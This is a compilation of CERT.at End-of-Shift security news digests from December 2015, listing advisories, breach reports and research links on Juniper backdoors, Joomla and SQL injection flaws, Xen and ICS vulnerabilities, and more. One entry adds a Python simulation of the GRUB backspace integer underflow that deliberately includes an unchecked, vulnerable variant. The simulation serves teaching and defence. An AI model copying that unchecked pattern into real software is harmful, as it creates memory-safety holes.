http://www.darkreading.com/endpoint/2015-ransomware-wrap-up/d/d-id/1323424
*** 3-in-1 Malware Infection through Spammed JavaScript Attachments ***
---------------------------------------------
Recently we've observed a massive uptick of malicious spam with JavaScript attachments with an intention to spread and infect Windows systems with a variety of malicious executables. The spam usually contains a ZIP file attachment containing only one JavaScript file. The ..
---------------------------------------------
https://www.trustwave.com/Resources/SpiderLabs-Blog/3-in-1-Malware-Infectio…
*** IT bloke: Crooks stole my bikes after cycling app blabbed my address ***
---------------------------------------------
Brit suffers from GPS accuracy. An IT manager in Manchester, England, says thieves stole his bikes after a smartphone cycling app pinpointed the location of his garage ..
---------------------------------------------
www.theregister.co.uk/2015/12/22/it_manager_loses_bikes_after_cycling_app_p…
*** Xen Project blunder blows own embargo with premature bug report ***
---------------------------------------------
Malicious guest could eat your virtual rigs from the inside. The Xen Project has reported a new bug, XSA-169, that means 'A malicious guest could cause repeated logging to the hypervisor console, leading to a Denial of Service attack.' ..
---------------------------------------------
www.theregister.co.uk/2015/12/23/xen_blunder_blows_own_embargo_with_prematu…
*** Expect Phishers to Up Their Game in 2016 ***
---------------------------------------------
Expect phishers and other password thieves to up their game in 2016: Both Google and Yahoo! are taking steps to kill off the password as we know it. New authentication methods now offered by Yahoo! and to a beta group of Google users let customers log in just by supplying their email address, and then responding to a notification sent to their mobile device.
---------------------------------------------
http://krebsonsecurity.com/2015/12/expect-phishers-to-up-their-game-in-2016
*** Why it's harder to forge a SHA-1 certificate than it is to find a SHA-1 collision ***
---------------------------------------------
It's well known that SHA-1 is no longer considered a secure cryptographic hash function. Researchers now believe that finding a hash collision (two values that result in the same value when SHA-1 is applied) is inevitable and likely to happen in a matter of months. This poses a potential threat to trust on the web, as many websites use certificates that are digitally signed with algorithms that rely on SHA-1. Luckily for everyone, finding a hash collision is not enough to forge a digital
---------------------------------------------
https://blog.cloudflare.com/why-its-harder-to-forge-a-sha-1-certificate-tha…
*** Cyberattacks on Turkish Internet servers ***
---------------------------------------------
Unclear background - is Russia behind it? Or Anonymous?
---------------------------------------------
http://derstandard.at/2000028013290
*** Hackers: film stars with problems on the net ***
---------------------------------------------
Brand-new feature films such as Quentin Tarantino's latest western have surfaced on the Internet. A number of other stars have quite different problems: a hacker obtained sex videos and personal data from them - however, he has now been arrested.
---------------------------------------------
http://www.golem.de/news/hacker-filmstars-mit-problemen-im-netz-1512-118179…
*** How a security director used a rootkit to rig the lottery and steal millions of dollars ***
---------------------------------------------
Not too long ago, Eddie Tipton was convicted of hacking into the Multi-State Lottery Association's computer system in order to rig a nearly $17 million jackpot in Iowa. Now comes word that an investigation into Tipton's hacking activities is expanding to include a number of other states. Thus far, lottery officials from Colorado, Wisconsin and Oklahoma have indicated that Tipton may have also gamed lottery jackpots in their respective states.
---------------------------------------------
https://bgr.com/2015/12/23/lottery-hacker-rootkit-stolen-numbers-investigat…
*** Siemens RUGGEDCOM ROX-based Devices NTP Vulnerabilities ***
---------------------------------------------
This advisory contains mitigation details for NTP daemon vulnerabilities in the Siemens RUGGEDCOM ROX-based devices.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-15-356-01
Due to the Christmas holidays, the next End-of-Shift Report will not appear until 28.12.2015.
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 21-12-2015 18:00 − Tuesday 22-12-2015 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** IBM Security Bulletin: Blind SQL injection vulnerability in IBM OpenPages GRC Platform API (CVE-2015-5049) ***
---------------------------------------------
A blind SQL injection vulnerability has been found in the OpenPages GRC Platform API that could allow retrieval or manipulation of information in the database.
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg21970590
*** Cisco IOS XE Software Packet Processing Denial of Service Vulnerability ***
---------------------------------------------
The vulnerability is due to incorrect processing of packets that have a source MAC address of 0000:0000:0000. An attacker could exploit this vulnerability by sending a frame that has a source MAC address of all zeros to an affected device. A successful exploit could allow the attacker to cause the device to reload.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** [20151207] - Core - SQL Injection ***
---------------------------------------------
Inadequate filtering of request data leads to a SQL Injection vulnerability.
---------------------------------------------
https://developer.joomla.org/security-centre/640-20151207-core-sql-injectio…
*** [20151206] - Core - Session Hardening ***
---------------------------------------------
The Joomla Security Strike team has been following up on the critical security vulnerability patched last week. Since the recent update it has become clear that the root cause is a bug in PHP itself. This was fixed by PHP in September of 2015 with the releases of PHP 5.4.45, 5.5.29, 5.6.13 (Note that this is fixed in all versions of PHP 7 and has been back-ported in some specific Linux LTS versions of PHP 5.3). This fixes the bug across all supported PHP versions.
---------------------------------------------
https://developer.joomla.org/security-centre/639-20151206-core-session-hard…
*** First Exploit Attempts For Juniper Backdoor Against Honeypot ***
---------------------------------------------
We are detecting numerous login attempts against our ssh honeypots using the ScreenOS backdoor password. Our honeypot doesn't emulate ScreenOS beyond the login banner, so we do not know what the attackers are up to, but some of the attacks appear to be manual in that we do see the attacker trying different ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20525
*** Protecting Your Sites from Apache.Commons Vulnerabilities ***
---------------------------------------------
A few weeks ago, FoxGlove Security released this important blog post that includes several Proof-of-Concepts for exploiting Java unserialize vulnerabilities. A remote attacker can gain Remote Code Execution by sending a specially crafted payload to any endpoint expecting a serialized ..
---------------------------------------------
https://www.trustwave.com/Resources/SpiderLabs-Blog/Protecting-Your-Sites-f…
*** Oracle must improve Java updates ***
---------------------------------------------
Old Java versions must be removed completely from computers. Oracle has to make sure of that.
---------------------------------------------
http://heise.de/-3052761
*** Shopshifting: security researchers uncover flaws in electronic payments ***
---------------------------------------------
Payment terminals talk over the network to their cash register and to the payment service provider. Both communication channels have weaknesses that an attacker can use to rob customers or shop owners.
---------------------------------------------
http://heise.de/-3052165
*** rt-sa-2015-013 ***
---------------------------------------------
https://www.redteam-pentesting.de/advisories/rt-sa-2015-013.txt
*** Juniper backdoors ***
---------------------------------------------
In an advisory (here is our warning on it), Juniper told the world that it found two backdoors in ScreenOS during a code audit. One of them is a technically rather trivial matter: a constant password allows login via ssh or telnet. Supposedly it took only 6 hours to ..
---------------------------------------------
http://www.cert.at/services/blog/20151222153859-1646.html
*** IBM Security Bulletin: Multiple XSS Vulnerabilities in IBM UrbanCode Deploy (CVE-2015-7415) ***
---------------------------------------------
IBM UrbanCode Deploy is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker ..
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg21970811
*** Report: hackers have infiltrated parts of the US power grid ***
---------------------------------------------
In around twelve cases, cyberattacks on control centres of energy suppliers in the USA are said to have succeeded during the past ten years. The hack of the provider Calpine probably originated from Iran.
---------------------------------------------
http://heise.de/-3054887
*** Call for Papers: VB2016 Prague ***
---------------------------------------------
VB seeks submissions for the 26th Virus Bulletin Conference. Virus Bulletin is seeking submissions from those wishing to present papers at VB2016, which will take place 5 to 7 October 2016 at the Hyatt Regency Denver Hotel in Denver, Colorado, USA. Originally started as an annual gathering of anti-virus experts, the ..
---------------------------------------------
http://www.virusbtn.com/blog/2015/12_22.xml
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 18-12-2015 18:00 − Monday 21-12-2015 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Update for the Microsoft Word Intruder crimeware kit ***
---------------------------------------------
Via security holes in Microsoft Word, a file attachment can infect Windows systems as soon as it is opened. The author of the crimeware kit MWI, popular in the underground, is now following up with new exploits.
---------------------------------------------
http://heise.de/-3049547
*** VMSA-2015-0009 ***
---------------------------------------------
VMware product updates address a critical deserialization vulnerability
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2015-0009.html
*** VMSA-2015-0003.15 ***
---------------------------------------------
VMware product updates address critical information disclosure issue in JRE
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2015-0003.html
*** Avira Registry Cleaner DLL Hijacking ***
---------------------------------------------
avira_registry_cleaner_en.exe, available from
<https://www.avira.com/en/download/product/avira-registry-cleaner>
to clean up remnants the uninstallers of their snakeoil products
fail to remove, is vulnerable: it loads and executes WTSAPI32.dll,
UXTheme.dll and RichEd20.dll from its application directory
(tested and verified under Windows XP SP3 and Windows 7 SP1).
---------------------------------------------
https://cxsecurity.com/issue/WLB-2015120223
*** PUPs Masquerade as Installer for Antivirus and Anti-Adware ***
---------------------------------------------
If you're looking for download sites of programs you wish to install onto your machine or simply try out, you, dear Reader, would be better off dropping by their official websites.
---------------------------------------------
https://blog.malwarebytes.org/online-security/2015/12/pups-masquerade-as-in…
*** Joomla 0-Day Exploited In the Wild (CVE-2015-8562) ***
---------------------------------------------
A recent new 0-day in Joomla discovered by Sucuri (Sucuri Blog) has drawn a lot of attention from the Joomla community, as well as attackers. Using knowledge gained from our recent research on Joomla (CVE-2015-7857, SpiderLabs Blog Post) and information ..
---------------------------------------------
https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-0-Day-Exploited-…
*** Google Chrome: farewell to SHA-1-signed SSL certificates ***
---------------------------------------------
From the beginning of next year, Google Chrome will no longer accept newly issued SHA-1-signed SSL certificates from public CAs. SHA-1 has been considered insecure for ten years but is still used by HTTPS sites.
---------------------------------------------
http://heise.de/-3049749
*** The EPS Awakens - Part 2 ***
---------------------------------------------
https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-t…
*** Facebook hammers another nail into Flash's coffin ***
---------------------------------------------
The Social Network™ bins Adobe's malware-magnet for video, adopts HTML5. Facebook has hammered another nail into the coffin of Adobe Flash, by switching from the bug-ridden plug-in to HTML5 for all videos on the site.
---------------------------------------------
www.theregister.co.uk/2015/12/21/facebook_dumps_flash_for_video/
*** Hello Kitty: children's data unprotected on the net ***
---------------------------------------------
A MongoDB database with the private information of numerous Hello Kitty fans has been published. Children in particular are likely to be affected - and should check their passwords on other services.
---------------------------------------------
http://www.golem.de/news/security-hello-kitty-gehackt-1512-118123.html
*** XXX is Angler EK ***
---------------------------------------------
http://malware.dontneedcoffee.com/2015/12/xxx-is-angler-ek.html
*** Snooping code in Juniper network devices: further findings and speculation ***
---------------------------------------------
Analyses of the ScreenOS updates are bringing wild things to light. There were two independent backdoors. Thanks to the published password, anyone can exploit the SSH backdoor; the more complex VPN hole is probably based on a known NSA backdoor.
---------------------------------------------
http://heise.de/-3051260
*** The many attacks on Zengge WiFi lightbulbs ***
---------------------------------------------
In August I decided to check out the cool new Internet Of Things. I bought a WiFi-enabled colorful LED lightbulb. It was a cheap Chinese one that costs almost nothing on Alibaba, but I paid probably around $50 on Amazon. It's built by a company called Zengge. It turned out that my new lightbulb was a router, an HTTP server, an HTTP proxy, and a lot more.
---------------------------------------------
http://blog.viktorstanchev.com/2015/12/20/the-many-attacks-on-zengge-wifi-l…
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 17-12-2015 18:00 − Friday 18-12-2015 18:00
Handler: Stephan Richter
Co-Handler: Alexander Riepl
*** JSA10713 - 2015-12 Out of Cycle Security Bulletin: ScreenOS: Multiple Security issues with ScreenOS (CVE-2015-7755) ***
---------------------------------------------
http://kb.juniper.net/index?page=content&id=JSA10713
*** JSA10712 - 2015-12 Out of Cycle Security Bulletin: ScreenOS: Crafted SSH negotiation may trigger system crash (CVE-2015-7754) ***
---------------------------------------------
http://kb.juniper.net/index?page=content&id=JSA10712
*** Cisco Model DPQ3925 Wireless Residential Gateway Information Disclosure Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Schneider Electric Modicon M340 Buffer Overflow Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a buffer overflow vulnerability in Schneider Electric's Modicon M340 PLC product line.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-15-351-01
*** Motorola MOSCAD SCADA IP Gateway Vulnerabilities ***
---------------------------------------------
This advisory contains mitigation details for Remote File Inclusion and Cross-Site Request Forgery vulnerabilities in Motorola Solutions MOSCAD IP Gateway.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-15-351-02
*** eWON Vulnerabilities ***
---------------------------------------------
This advisory contains mitigation details for several vulnerabilities in the eWON sa industrial router.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-15-351-03
*** Microsoft will stop trusting certificates from 20 Certificate Authorities ***
---------------------------------------------
Starting in January 2016, Microsoft's Trusted Root Certificate Program will no longer include twenty currently trusted CAs and will remove their root certificates from the Trusted ..
---------------------------------------------
http://www.net-security.org/secworld.php?id=19252
*** Docker and Enterprise Security: Establishing Best Practices ***
---------------------------------------------
Virtualization containers, with their extraordinarily efficient hardware utilization, can be like a dream come true for development teams. While containerization will probably ..
---------------------------------------------
http://resources.infosecinstitute.com/docker-and-enterprise-security-establ…
*** IBM Security Bulletins ***
---------------------------------------------
*** Infosphere BigInsights is affected by a vulnerability in DB2 (CVE-2015-1947) ***
http://www.ibm.com/support/docview.wss?uid=swg21967131
---------------------------------------------
*** IBM InfoSphere Balanced Warehouse C3000, C4000, IBM Smart Analytics System 1050, 2050 and 5710 are affected by multiple vulnerabilities in OpenSSL ***
http://www.ibm.com/support/docview.wss?uid=swg21971298
---------------------------------------------
*** Multiple vulnerabilities in current releases of IBM SDK for Node.js in IBM Bluemix ***
http://www.ibm.com/support/docview.wss?uid=swg21973447
---------------------------------------------
*** Multiple Security Vulnerabilities affect IBM Security Privileged Identity Manager Virtual Appliance ***
http://www.ibm.com/support/docview.wss?uid=swg21972496
---------------------------------------------
*** Multiple vulnerabilities in IBM Java SDK affect Rational Functional Tester (CVE-2015-4872, CVE-2015-4734, CVE-2015-5006) ***
http://www.ibm.com/support/docview.wss?uid=swg21972844
---------------------------------------------
*** A vulnerability in lighttpd affects IBM Security Virtual Server Protection for VMware (CVE-2015-3200) ***
http://www.ibm.com/support/docview.wss?uid=swg21973291
---------------------------------------------
*** Multiple vulnerabilities in IBM Java SDK affect IBM API Management ***
http://www.ibm.com/support/docview.wss?uid=swg21972828
---------------------------------------------
*** Citrix XenServer Multiple Security Updates ***
---------------------------------------------
A number of security vulnerabilities have been identified in Citrix XenServer that could, in certain configurations, allow a malicious administrator of a guest VM to compromise the host or obtain potentially sensitive information from other guest VMs. In addition, a vulnerability has been identified that would allow certain applications running on a guest to cause that guest to crash.
---------------------------------------------
https://support.citrix.com/article/CTX203879
*** Vuln: Microsoft Windows Environment Variable Expansion in PATH Security Bypass Weakness ***
---------------------------------------------
http://www.securityfocus.com/bid/44484
*** Cisco IOS and IOS XE Software IKEv1 State Machine Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** SSA-472334 (Last Update 2015-12-18): NTP Vulnerabilities in RUGGEDCOM ROX-based Devices ***
---------------------------------------------
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-472334…
*** SSA-396873 (Last Update 2015-12-18): TLS Vulnerability in Ruggedcom ROS- and ROX-based Devices ***
---------------------------------------------
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-396873…
*** iOS banking apps security still not good enough, says researcher ***
---------------------------------------------
Repeat test throws up improved results from 2013 but problems remain. The security of mobile banking apps has improved over the ..
---------------------------------------------
www.theregister.co.uk/2015/12/18/ios_banking_app_audit/
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 16-12-2015 18:00 − Thursday 17-12-2015 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Press Backspace 28 times to own unlucky Grub-by Linux boxes ***
---------------------------------------------
Integer underflow fault means you can get into rescue mode and rummage around. A pair of researchers from the University of Valencia's Cybersecurity research group have found that if you press backspace 28 times, it's possible to bypass authentication during boot-up on some Linux machines.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2015/12/17/press_backs…
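The Register piece attributes the bypass to an integer underflow in the backspace handling of the boot-time login prompt. What follows is an added illustration of that bug class written for this digest; it is not GRUB's source. It models a fixed-size line editor whose unsigned length counter is decremented on every backspace, once without and once with the zero check. The 16-byte buffer and the key sequences are assumptions chosen for the demo, and C's unsigned wrap-around is emulated with a 32-bit mask.

```python
UINT32_MASK = 0xFFFFFFFF  # emulates C 'unsigned' wrap-around (assumption: 32-bit)


def edit_line(keys: str, buf_size: int = 16, checked: bool = True) -> tuple[str, int]:
    """Replay key presses through a fixed-size line editor.

    Returns (text entered, final length). checked=True is the corrected
    handler; checked=False reproduces the faulty pattern, an unsigned
    cur_len-- on a value that is already zero, which wraps to 2**32 - 1.
    """
    buf: list[str] = []
    cur_len = 0
    for key in keys:
        if key == "\b":
            if checked:
                if cur_len:                # the fix: never go below zero
                    cur_len -= 1
                    buf.pop()
            else:
                cur_len = (cur_len - 1) & UINT32_MASK   # 0 wraps to 4294967295
                if buf:
                    buf.pop()
            continue
        if key == "\n":                    # Enter ends the line
            break
        # Keep one byte for the terminating NUL a C implementation appends.
        if ((cur_len + 1) & UINT32_MASK) < buf_size:
            buf.append(key)
            cur_len = (cur_len + 1) & UINT32_MASK
    return "".join(buf), cur_len


def final_write_in_bounds(cur_len: int, buf_size: int = 16) -> bool:
    """Would the terminating buf[cur_len] = '\\0' of a C editor land inside the buffer?"""
    return cur_len < buf_size


if __name__ == "__main__":
    for mode in (True, False):
        text, length = edit_line("\b" * 28, checked=mode)
        print(f"checked={mode}: length={length}, in bounds={final_write_in_bounds(length)}")
```

Twenty-eight backspaces on an empty prompt leave the unchecked counter at 4294967268, so the terminating write in a C implementation would land far outside a 16-byte buffer, while the checked variant stays at 0. Why exactly 28 presses matter on the affected machines, and what gets overwritten, depends on the real memory layout and is not something this model reproduces.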
*** Checklist - How to Secure Your WordPress Website ***
---------------------------------------------
We know that you care about what you build and protecting it is incredibly important. Hacks happen, and it's your job to reduce their likelihood to the lowest probability possible. We built this checklist of best practices to help you harden your website and protect you and your users from hacks.
---------------------------------------------
https://www.wordfence.com/learn/checklist-how-to-secure-your-wordpress-webs…
*** Privileged Access Workstations ***
---------------------------------------------
Privileged Access Workstations (PAWs) provide a dedicated operating system for sensitive tasks that is protected from Internet attacks and threat vectors. Separating these sensitive tasks and accounts from the daily use workstations and devices provides very strong protection from phishing attacks, application and OS vulnerabilities, various impersonation attacks, and credential theft attacks such as keystroke logging, Pass-the-Hash, and Pass-The-Ticket.
---------------------------------------------
https://technet.microsoft.com/en-US/library/mt634654.aspx
*** F-Secure: Sandboxed Execution Environment ***
---------------------------------------------
Sandboxed Execution Environment (SEE) is a framework for building test automation in secured environments. The sandboxes, provided via libvirt, are customizable, allowing a high degree of flexibility. Different types of hypervisors (Qemu, VirtualBox, LXC) can be employed to run the test environments. Plugins can be added to a test environment, and an event mechanism synchronises their interaction. Users can enable and configure the plugins through a JSON configuration file.
---------------------------------------------
https://github.com/F-Secure/see
*** How do you know if your smartphone has been compromised? ***
---------------------------------------------
Signs that may indicate a mobile infection: Has your phone been compromised? #1: You notice the system or apps behaving strangely #2: Your call or message history includes some unknown entries ...
---------------------------------------------
http://www.welivesecurity.com/2015/12/16/know-smartphone-compromised/
*** XSS, SQLi bugs found in several Network Management Systems ***
---------------------------------------------
Network Management System (NMS) offerings by Spiceworks, Ipswitch, Opsview and Castle Rock Computing have been found sporting several cross-site scripting and SQL injection flaws that could be exploit...
---------------------------------------------
http://feedproxy.google.com/~r/HelpNetSecurity/~3/hQ6oQHF5luA/secworld.php
*** POS Malware Families: An insight into the Behavior of POS Malware ***
---------------------------------------------
In a previous blog, we discussed why Point of Sale (POS) devices remain such an attractive target and described some different attack methods. As you can see from the infographic below, retail and POS have been (pardon the pun) "Targets" on an ongoing basis for the past few years, and the trend doesn't appear to be reversing, even with technologies such as EMV and P2PE. In this blog, we describe some of the different families of POS malware. POS Malware Common Features...
---------------------------------------------
https://feeds.feedblitz.com/~/128665939/0/alienvault-blogs~POS-Malware-Fami…
*** Xen Security Advisories ***
---------------------------------------------
XSA-155 - paravirtualized drivers incautious about shared memory contents
http://xenbits.xen.org/xsa/advisory-155.html
---------------------------------------------
XSA-157 - Linux pciback missing sanity checks leading to crash
http://xenbits.xen.org/xsa/advisory-157.html
---------------------------------------------
XSA-164 - qemu-dm buffer overrun in MSI-X handling
http://xenbits.xen.org/xsa/advisory-164.html
---------------------------------------------
XSA-165 - information leak in legacy x86 FPU/XMM initialization
http://xenbits.xen.org/xsa/advisory-165.html
---------------------------------------------
XSA-166 - ioreq handling possibly susceptible to multiple read issue
http://xenbits.xen.org/xsa/advisory-166.html
---------------------------------------------
*** DFN-CERT-2015-1948: Samba: Multiple vulnerabilities allow, among other things, bypassing security measures ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2015-1948/
*** Cisco FireSIGHT Management Center SSL HTTP Attack Detection Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Security Advisory: BIND vulnerability CVE-2015-8000 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/34/sol34250741.html?…
*** Multiple SQL Injection Vulnerabilities in Citrix Command Center Web User Interface Java Servlets ***
---------------------------------------------
A number of SQL Injection vulnerabilities have been identified in the Administration Web UI servlets used by Citrix Command Center. These vulnerabilities, if exploited, could allow an authenticated user to insert malicious SQL queries into the application, potentially causing the alteration or deletion of system data.
---------------------------------------------
http://support.citrix.com/article/CTX203787
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM API Management (CVE-2015-1788) ***
http://www.ibm.com/support/docview.wss?uid=swg21965259
---------------------------------------------
*** IBM Security Bulletin: Fix available for Information Disclosure Vulnerability in IBM WebSphere Portal (CVE-2015-7447) ***
http://www.ibm.com/support/docview.wss?uid=swg21973152
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Apache Commons affects IBM Content Manager Services for Lotus Quickr (CVE-2015-7450) ***
http://www.ibm.com/support/docview.wss?uid=swg21973096
---------------------------------------------
*** IBM Security Bulletin: Tivoli Storage Manager for Virtual Environments: Data Protection for VMware and Tivoli Storage FlashCopy Manager for VMware affected by privilege escalation vulnerability (CVE-2015-7429) ***
http://www.ibm.com/support/docview.wss?uid=swg21973087
---------------------------------------------
*** IBM Security Bulletin: Tivoli Storage Manager for Virtual Environments: Data Protection for VMware and Tivoli Storage FlashCopy Manager for VMware affected by unauthorized access vulnerability (CVE-2015-7420) ***
http://www.ibm.com/support/docview.wss?uid=swg21973086
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli Application Dependency Discovery Manager (TADDM) - IBM Java SDK updates October 2015 ***
http://www.ibm.com/support/docview.wss?uid=swg21973355
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM HTTP Server (IHS) affect IBM Security SiteProtector System (CVE-2015-1283, CVE-2015-3183 and CVE-2015-4947) ***
http://www.ibm.com/support/docview.wss?uid=swg21972470
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in OpenSSL affects IBM Content Collector for SAP Applications (CVE-2015-1788) ***
http://www.ibm.com/support/docview.wss?uid=swg21973147
---------------------------------------------
*** IBM Security Bulletin: IBM PowerVC is impacted by OpenStack Cinder information disclosure vulnerability (CVE-2015-1851) ***
http://www.ibm.com/support/docview.wss?uid=nas8N1020980
---------------------------------------------
*** IBM Security Bulletin: Infosphere BigInsights is affected by a vulnerability in DB2 that allows users to truncate any table even though the owner of the table has not granted any privilege to any user/role/group (CVE-2015-5020) ***
http://www.ibm.com/support/docview.wss?uid=swg21967923
---------------------------------------------
*** IBM Security Bulletin: Infosphere BigInsights is affected by a vulnerability in DB2 (CVE-2015-1788) ***
http://www.ibm.com/support/docview.wss?uid=swg21970400
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Apache Commons affects OpenPages GRC Platform with Application Server (CVE-2015-7450) ***
http://www.ibm.com/support/docview.wss?uid=swg21972345
---------------------------------------------
*** IBM Security Bulletin: IBM Curam Social Program Management is Vulnerable to Reflected Cross-Site Scripting (CVE-2015-7402) ***
http://www.ibm.com/support/docview.wss?uid=swg21970661
---------------------------------------------
*** ZDI-15-641: Foxit Reader Forms Out-Of-Bounds Read Remote Code Execution Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/LfsseiLCccs/
*** ZDI-15-643: Foxit Reader Will Print Action Use-After-Free Remote Code Execution Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/28dKwkM6_5M/
*** ZDI-15-642: Foxit Reader Will Save Document Action Use-After-Free Remote Code Execution Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/uY-c98zZjQI/
*** ZDI-15-644: Foxit Reader FlateDecode Heap Buffer Overflow Remote Code Execution Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/s3waojIPu0E/
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 15-12-2015 18:00 − Wednesday 16-12-2015 18:00
Handler: Stephan Richter
Co-Handler: Alexander Riepl
*** IBM Security Bulletin ***
---------------------------------------------
*** Multiple vulnerabilities in IBM Java SDK affect IBM Rational Connector for SAP Solution Manager ***
http://www.ibm.com/support/docview.wss?uid=swg21967447
---------------------------------------------
*** IBM Security Bulletin: Security Vulnerability in IBM WebSphere Application Server shipped with IBM Tivoli Netcool Configuration Manager ***
http://www.ibm.com/support/docview.wss?uid=swg21972884
---------------------------------------------
*** IBM Security Bulletin: Openstack Cinder and Horizon vulnerabilities affect IBM Cloud Manager with OpenStack ***
http://www.ibm.com/support/docview.wss?uid=isg3T1023146
---------------------------------------------
*** IBM Security Bulletin: IBM QRadar SIEM is vulnerable to path traversal attack. ***
http://www.ibm.com/support/docview.wss?uid=swg21967647
---------------------------------------------
*** IBM Security Bulletin: A security vulnerability exist in the IBM SDK, Java Technology Edition provided with WebSphere DataPower XC10 Appliance ***
http://www.ibm.com/support/docview.wss?uid=swg21972660
---------------------------------------------
*** IBM Security Bulletin: IBM QRadar SIEM is vulnerable to Stored cross-site scripting. ***
http://www.ibm.com/support/docview.wss?uid=swg21973175
---------------------------------------------
*** FireEye Exploitation: Project Zero's Vulnerability of the Beast ***
---------------------------------------------
FireEye sells security appliances to enterprise and government customers. FireEye's flagship products are monitoring devices designed to be installed at egress points of large networks, i.e. where traffic flows from the intranet to the internet. To give a ..
---------------------------------------------
http://googleprojectzero.blogspot.com/2015/12/fireeye-exploitation-project-…
*** Security Management vs Chaos: Understanding the Butterfly Effect to Manage Outcomes & Reduce Chaos ***
---------------------------------------------
And now for something completely different. Subtitle: Captain Obvious Applies Chaos Theory. Introduction: This diary breaks a bit from our expected norms to discuss managing possible outcomes originating from a data breach ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20495
*** Security Advisory: Multiple MySQL vulnerabilities ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/59/sol59010802.html?…
*** VB2015 video: Making a dent in Russian mobile banking phishing ***
---------------------------------------------
Sebastian Porst explains what Google has done to protect users from phishing apps targeting Russian banks. In the last few years, mobile malware has evolved from a mostly theoretical threat to a very serious one that affects many users. Indeed, several talks at VB2015 dealt with various aspects of mobile ..
---------------------------------------------
http://www.virusbtn.com/blog/2015/12_16.xml
*** Adcon Telemetry A840 Vulnerabilities ***
---------------------------------------------
This advisory contains mitigation details for vulnerabilities in Adcon Telemetry's A840 Telemetry Gateway Base Station.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-15-349-01
*** Advantech EKI Vulnerabilities (Update A) ***
---------------------------------------------
This updated advisory is a follow-up to the original advisory titled ICSA-15-344-01 Advantech EKI Vulnerabilities that was published December 10, 2015, on the NCCIC/ICS-CERT web site.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-15-344-01
*** Sophos UTM security package riddled with holes ***
---------------------------------------------
The Unified Threat Management package from Sophos is at risk: according to a security researcher, attackers could, for example, disable the firewall. The holes are said to be fixed already, but patches are not yet available.
---------------------------------------------
http://heise.de/-3044717
*** DFN-CERT-2015-1937: ISC BIND9: Two vulnerabilities allow a denial-of-service attack ***
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2015-1937/
*** Driving an industry towards secure code ***
---------------------------------------------
The German government made an unprecedented move this week by issuing requirements for all new vehicles' software to be made accessible to country regulators to ensure that emissions loopholes aren't ...
---------------------------------------------
http://www.net-security.org/article.php?id=2431
*** Playing With Sandboxes Like a Boss ***
---------------------------------------------
Last week, Guy wrote a nice diary to explain how to easily deploy IRMA to analyze suspicious files. Having a good tool to work on files locally is always interesting for multiple reasons. You are doing some independent research, you ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20501
*** Attacking WPA2 Enterprise ***
---------------------------------------------
The widespread use of mobile and portable devices in the enterprise environment requires a proper implementation of the wireless network infrastructure to provide them connectivity and ensure the business functionality. WPA-Enterprise is ..
---------------------------------------------
